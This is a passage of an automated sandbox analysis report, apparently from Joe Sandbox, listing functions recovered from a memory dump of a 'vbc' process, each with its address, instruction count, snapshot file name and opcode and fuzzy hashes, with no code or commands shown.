                                                                                                                        • Opcode Fuzzy Hash: 47dbf6b8a8eedf23e7c07262d17334ec7c908fcab1fb71ec159192e1ce5f8f81
                                                                                                                        • Instruction Fuzzy Hash: 00C16D70E04259DFDB28DF99C888EAEFBBAFF44314F205129E805AB645DB71A941CF50
                                                                                                                        Function 053383C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: be670af6ec6757a3d9a1fe92a3c9f939c89c65fff540c83b1627c7dc31d0f46e
                                                                                                                        • Instruction ID: db4868615c0aa82429bd0b2acef820a1699c13bf8b6048949981ecdbda3c76ab
                                                                                                                        • Opcode Fuzzy Hash: be670af6ec6757a3d9a1fe92a3c9f939c89c65fff540c83b1627c7dc31d0f46e
                                                                                                                        • Instruction Fuzzy Hash: 1FC16970608341CFEB64CF19C495BABB7E5BF88304F44496DE98A97290D7B4E908CF92
                                                                                                                        Function 0532C427 Relevance: .3, Instructions: 280COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 61872a0e6b8fa2758795545aec6fce8e022f73f6b8f9e790c5d4c5f014202208
                                                                                                                        • Instruction ID: 6741b085f8b516629435cdad8e11aa4407c399a83fed671cbbf36d0c509b380f
                                                                                                                        • Opcode Fuzzy Hash: 61872a0e6b8fa2758795545aec6fce8e022f73f6b8f9e790c5d4c5f014202208
                                                                                                                        • Instruction Fuzzy Hash: EBB17E70B046699BDB64DF55C894BBDB3B6BF44710F1485EAD40AE7280EB70DD86CB20
                                                                                                                        Function 0535E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 99c675d11200dbf8ed31af291ed89c591bf2d5c6bff397a91dc46bee24512e99
                                                                                                                        • Instruction ID: 3f1147b57fc116ad656395fd0ae5292fc97d19c997532623904d37681553eba5
                                                                                                                        • Opcode Fuzzy Hash: 99c675d11200dbf8ed31af291ed89c591bf2d5c6bff397a91dc46bee24512e99
                                                                                                                        • Instruction Fuzzy Hash: 3FA13771E046189FDF26DB68C848FAEBBAABF04760F054155ED11EB280D7B4AE40CBD1
                                                                                                                        Function 05370185 Relevance: .3, Instructions: 276COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a917f96fde39e583f230d72660169b476b5508a31456207d5eab0955b95b4f4c
                                                                                                                        • Instruction ID: 9b6f3a2954c8271d3e498c7dd67cba5704cb97b2e315287d0a386bbf22cd07f7
                                                                                                                        • Opcode Fuzzy Hash: a917f96fde39e583f230d72660169b476b5508a31456207d5eab0955b95b4f4c
                                                                                                                        • Instruction Fuzzy Hash: 1EA1AF72B0061A9BDB38DF65C999BBAB7F6FF44314F004029EA45E7291DB78A811CF50
                                                                                                                        Function 05404500 Relevance: .3, Instructions: 275COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a702554fa08ab7890b0de405a0f5b69e243d3e53d672d6d58e4bfbca6f9924dc
                                                                                                                        • Instruction ID: fe2fc9f464fa31b82cf1d58cb5202710572c2ef506e13c0ccb2edc98429f8d51
                                                                                                                        • Opcode Fuzzy Hash: a702554fa08ab7890b0de405a0f5b69e243d3e53d672d6d58e4bfbca6f9924dc
                                                                                                                        • Instruction Fuzzy Hash: BDA1DE72A04211AFCB21DF14C984BAAB7EAFF48304F61097AF6459B790D734ED41CB91
                                                                                                                        Function 053B60E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1b5f890359e816cec6330944699badfbe8ef7c84292c855384192d37eae6d5dd
                                                                                                                        • Instruction ID: 648eb1ca38d89dd3fde652aa8bb825423fa3090303896470542e32dd855b7881
                                                                                                                        • Opcode Fuzzy Hash: 1b5f890359e816cec6330944699badfbe8ef7c84292c855384192d37eae6d5dd
                                                                                                                        • Instruction Fuzzy Hash: 9891C471E04219AFEF15CFA8C885BFEBBB5AF48310F144159E615EB752D7B4D9008BA0
                                                                                                                        Function 0534E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b473904be5e8bef0eee0940bd274daf818afa3ab695efcb2bce478f6e8af56d3
                                                                                                                        • Instruction ID: 1242b44e375ffe2b64a5f1708b2184729af54dd67a7c6cfc9b1c86b341779276
                                                                                                                        • Opcode Fuzzy Hash: b473904be5e8bef0eee0940bd274daf818afa3ab695efcb2bce478f6e8af56d3
                                                                                                                        • Instruction Fuzzy Hash: FF913872B046658BDB28DB28C444BBEB7EAFF84710F0580A9EC059B740EB74E941DF52
                                                                                                                        Function 05326D10 Relevance: .2, Instructions: 216COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b562f7d031cfcf9cc3f2fc337502b160d162b92fcefe490bf03d6878911d6dee
                                                                                                                        • Instruction ID: 5fee85891423040b4db78f9dc3d2115e1372158587e5fd8e9657a6684a1c67fb
                                                                                                                        • Opcode Fuzzy Hash: b562f7d031cfcf9cc3f2fc337502b160d162b92fcefe490bf03d6878911d6dee
                                                                                                                        • Instruction Fuzzy Hash: BF719EB3604742AFDB28EF15C980B7AB7E9FB48350F044929F956D7600E771E944CB92
                                                                                                                        Function 0536E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 239a13fb920b285a2ce7c1111eaec1f955e5e4ddb8d24986b8ea95b6aca618dc
                                                                                                                        • Instruction ID: 8245ca10f298b6c94ad83013f7fbc1eaf7340e6f22bf3a31d91b8e3d57faec97
                                                                                                                        • Opcode Fuzzy Hash: 239a13fb920b285a2ce7c1111eaec1f955e5e4ddb8d24986b8ea95b6aca618dc
                                                                                                                        • Instruction Fuzzy Hash: A5817C75A00609AFDB25DFA5C880BEFB7BAFF48340F10842DE556A7254DB70AC49DB60
                                                                                                                        Function 0534C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d46a655fefecc2e3faa56032a5bfcb7d52d226eda4acff0b4a66943b5fa640ec
                                                                                                                        • Instruction ID: 2cdb47523b307155c50057b77bbde346c7379c0e3a6a811a8f93ed6e348bceeb
                                                                                                                        • Opcode Fuzzy Hash: d46a655fefecc2e3faa56032a5bfcb7d52d226eda4acff0b4a66943b5fa640ec
                                                                                                                        • Instruction Fuzzy Hash: DB719BB5915269DFCB29CF58C490BBEFBB6FF89710F14511AE842AB250D774A800CBA0
                                                                                                                        Function 053C8D6B Relevance: .2, Instructions: 206COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fcccdea90c69084270d71ab877441aba752eb69a42c6879a31cb63a6c47c2104
                                                                                                                        • Instruction ID: e6f7f366b640ae56127afa66a2c6e7ffbd21461d235031b554cab59cc2d0aec6
                                                                                                                        • Opcode Fuzzy Hash: fcccdea90c69084270d71ab877441aba752eb69a42c6879a31cb63a6c47c2104
                                                                                                                        • Instruction Fuzzy Hash: C4719D70A042669FCB14DF69C844AFAFBF6FF45304B048099E894DB201E335EE45C7A0
                                                                                                                        Function 053E47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9ecad10ef5ced7e954c1199e20cf816d0f5c8a8c1e189c51343f675cdb1c2d6d
                                                                                                                        • Instruction ID: 21e5ca5a91fa3945c08bc8a7d01928628504f7780f9836e5508c8f11eec6c8fc
                                                                                                                        • Opcode Fuzzy Hash: 9ecad10ef5ced7e954c1199e20cf816d0f5c8a8c1e189c51343f675cdb1c2d6d
                                                                                                                        • Instruction Fuzzy Hash: 7371BE70A24238EFCF24DF95C946AAABBF8FF88310F41815AF515AB294CF759900CB54
                                                                                                                        Function 0534260B Relevance: .2, Instructions: 201COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d03580bcf07090669f018611c181c029a203688e4d663c96a2d35b3c4aded391
                                                                                                                        • Instruction ID: 50cda4e7d5c47aa28a5ed29a917b794e3cd20f032fe3723ddcb61fe73a216a34
                                                                                                                        • Opcode Fuzzy Hash: d03580bcf07090669f018611c181c029a203688e4d663c96a2d35b3c4aded391
                                                                                                                        • Instruction Fuzzy Hash: D971BB797046418FC315CF28C484B2BB7E6FF84210F0585AAF899DB352DBB8E846CB91
                                                                                                                        Function 053B035C Relevance: .2, Instructions: 198COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                        • Instruction ID: 9c5b8497db6a6cdbefe43df7653ea2247342fe51510eea4c81b89b6c23d8b368
                                                                                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                        • Instruction Fuzzy Hash: 82716C71E00609EFDB14DFA9C988ADEBBB8FF88300F104569E605A7650DB74EA41CB90
                                                                                                                        Function 053C62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 551af53626fc4ff91c65dd3e668f9bfad116d10f0e7a72b10298146c42ff4e63
                                                                                                                        • Instruction ID: f8ffacd9b2a55c2bacf90154f120d880a8d7c084f1cbd2c8540e963ccf86d1de
                                                                                                                        • Opcode Fuzzy Hash: 551af53626fc4ff91c65dd3e668f9bfad116d10f0e7a72b10298146c42ff4e63
                                                                                                                        • Instruction Fuzzy Hash: 5571E032200A01AFD732DF58C846F6ABBE6FF40720F1548ACE1568B6A0DBB5ED54CB50
                                                                                                                        Function 0536CDB1 Relevance: .2, Instructions: 197COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2bb7ef04d4cf3df81a36c07ac00ea376bc33b1b2c64874fc627abdddf814bcbe
                                                                                                                        • Instruction ID: 390b01addf4afea2f46f56dae8757940f849c97e5544294e5d777cc4d3b9b130
                                                                                                                        • Opcode Fuzzy Hash: 2bb7ef04d4cf3df81a36c07ac00ea376bc33b1b2c64874fc627abdddf814bcbe
                                                                                                                        • Instruction Fuzzy Hash: AA618A72A002099FCB18DFA8C895AAEB7B6FF08314F14956EE512EB294DB70DD41CB50
                                                                                                                        Function 05408324 Relevance: .2, Instructions: 192COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 414ed137aa850d7867b65efabbbe85f054790509c05479e2a2fe01e04c828509
                                                                                                                        • Instruction ID: 8d29ce3dbc62448dcc66d7a6cbe0e3882ee4a99aa1a10c7759837456b6684c21
                                                                                                                        • Opcode Fuzzy Hash: 414ed137aa850d7867b65efabbbe85f054790509c05479e2a2fe01e04c828509
                                                                                                                        • Instruction Fuzzy Hash: C6711971E00609AFDF15DF94C945FEFBBB9FB04350F20416AE520A7290E774AA45CB90
                                                                                                                        Function 0532CF50 Relevance: .2, Instructions: 190COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                                                                        • Instruction ID: 2efc9d5767cced3e9d1ff07f4f3da93371a1434c8ab09b6d170427c88ff6651a
                                                                                                                        • Opcode Fuzzy Hash: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                                                                        • Instruction Fuzzy Hash: 2F71AD71608F51ABD736AE24C904B36B7E6BF40771F540B1EE9D2469F1E3B0A842CB50
                                                                                                                        Function 053EA250 Relevance: .2, Instructions: 184COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 673585182d9d402be00913e6b55a0bfe9b59a7f4dc019602e17f0e0490b7dde3
                                                                                                                        • Instruction ID: 4817c15b8298151814209d24f1853afdf1817fd6e42550c35c2e347e547ca69d
                                                                                                                        • Opcode Fuzzy Hash: 673585182d9d402be00913e6b55a0bfe9b59a7f4dc019602e17f0e0490b7dde3
                                                                                                                        • Instruction Fuzzy Hash: 7551C372608721AFD722DE64C888E5BB7EDEFC4750F014929BA40DB290D774ED14CBA2
                                                                                                                        Function 0535EDD3 Relevance: .2, Instructions: 166COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 27a3ff4264fb731b841e3534769118cdd715797ca010d7941c709a129fd4571c
                                                                                                                        • Instruction ID: 3109cd48c0972f3dd99b549d52e6a87d65c83de711f38f7bbe92df0cc387aed1
                                                                                                                        • Opcode Fuzzy Hash: 27a3ff4264fb731b841e3534769118cdd715797ca010d7941c709a129fd4571c
                                                                                                                        • Instruction Fuzzy Hash: E551BBB1610780DFDB34DB55C888F6BB7EEBB40229F10586DE80297A00CBB4E984CB90
                                                                                                                        Function 0535CDF0 Relevance: .2, Instructions: 165COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                                                        • Instruction ID: dd6efbfe11f30a572ddc640af7cf7ec1ee912d47b5ed2c8b1cc127bb20f23be4
                                                                                                                        • Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                                                        • Instruction Fuzzy Hash: EF518FB2E0460ADFCF18CF98C980AEDB7BAFB48215F149179D856A7200D674AE41DF94
                                                                                                                        Function 053F8DAE Relevance: .2, Instructions: 162COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4a8e1cc31b2c0ecf60f0130b24126ed6c44c41a4aff8c02c308e036b63e13bd5
                                                                                                                        • Instruction ID: b71beb81b31996fdce720f575cc2b842de7b9f845dbceadd9f989dd6ee9be6d1
                                                                                                                        • Opcode Fuzzy Hash: 4a8e1cc31b2c0ecf60f0130b24126ed6c44c41a4aff8c02c308e036b63e13bd5
                                                                                                                        • Instruction Fuzzy Hash: C851D372608702AFD715DF28C844BAAB7E6FF84350F04492CFA9597290D774E908CB95
                                                                                                                        Function 053D8350 Relevance: .2, Instructions: 161COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 790b41bfe38895c0245ffffff610d7444011a75ee9732d04ac0191e5b2d216e6
                                                                                                                        • Instruction ID: 8c373239ddd6bdf4cdc51adb6dfb58fc1e31b1c9f9e22f12e83f7771fae81ae3
                                                                                                                        • Opcode Fuzzy Hash: 790b41bfe38895c0245ffffff610d7444011a75ee9732d04ac0191e5b2d216e6
                                                                                                                        • Instruction Fuzzy Hash: CE51BE71A00704DFD720DF96D884AABFBF9BF44714F10461EE196976A0C7B0B945CBA0
                                                                                                                        Function 0536E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 90a6f0bcfedd8f7a98268deeb4861ebb15f46cf3956788ce9649d9435e2b307f
                                                                                                                        • Instruction ID: e83438e439a9122d6e3fa42dcb25c551046631d66bcb09bd6ecf2c2bf7e6fde7
                                                                                                                        • Opcode Fuzzy Hash: 90a6f0bcfedd8f7a98268deeb4861ebb15f46cf3956788ce9649d9435e2b307f
                                                                                                                        • Instruction Fuzzy Hash: 53515976200A14DFCB22EFA4C984FAAB3FEFF04640F50482AE54297660D774ED54DB50
                                                                                                                        Function 0535AE00 Relevance: .2, Instructions: 158COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0dd880a76b3c9ad43efb921dc5a3afa35dc6003f9888093ab0210770e1e55351
                                                                                                                        • Instruction ID: b23fe3571083fcba29e301355c812eace636c1713a0d5850b980b89a87757a81
                                                                                                                        • Opcode Fuzzy Hash: 0dd880a76b3c9ad43efb921dc5a3afa35dc6003f9888093ab0210770e1e55351
                                                                                                                        • Instruction Fuzzy Hash: BC51DF72B11640EBDB26EF58CD94F3A777AFF45A61F154168F8028B650C674DC01EBA0
                                                                                                                        Function 053545B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                        • Instruction ID: e4362f81f84bd8eb614f9464b7d9763e4a0c63b7b33e1b4d71d608545a4831aa
                                                                                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                        • Instruction Fuzzy Hash: A6519071E04219ABCF19DFA4C854FEEBBB9AF45360F044069E911EB240D774ED84CBA0
                                                                                                                        Function 053D4180 Relevance: .2, Instructions: 156COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 951c012d8215c6456405959d47bc74a48152e162f20f97a15513b3786a77c868
                                                                                                                        • Instruction ID: 634ed2dd9b774ea9535e972d03ae9f24a778b1ed75351a61d9510b2fd98c6fed
                                                                                                                        • Opcode Fuzzy Hash: 951c012d8215c6456405959d47bc74a48152e162f20f97a15513b3786a77c868
                                                                                                                        • Instruction Fuzzy Hash: C05145726083459FCB54DF69E881A6BB7F5BBC8204F44492DF889C7250EBB0D915CB62
                                                                                                                        Function 0532EFD8 Relevance: .2, Instructions: 153COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5e434396ce7175d4155841097d1f0350428f0b02adca3a4daaf692ca26ec36fa
                                                                                                                        • Instruction ID: 437fcc6b2bf2b7b08ecafe49b762e0e06de95ba90021ad50d4f722206abd8d7a
                                                                                                                        • Opcode Fuzzy Hash: 5e434396ce7175d4155841097d1f0350428f0b02adca3a4daaf692ca26ec36fa
                                                                                                                        • Instruction Fuzzy Hash: 2451AD717087519FC304EF29D885A6BB7E9FF88614F04892DF899C7281DB30E905CBA2
                                                                                                                        Function 0536CC00 Relevance: .1, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6fcf909129064614c11a96283c40a72df333bd5f8b58e7d9ffdeda357f98cab8
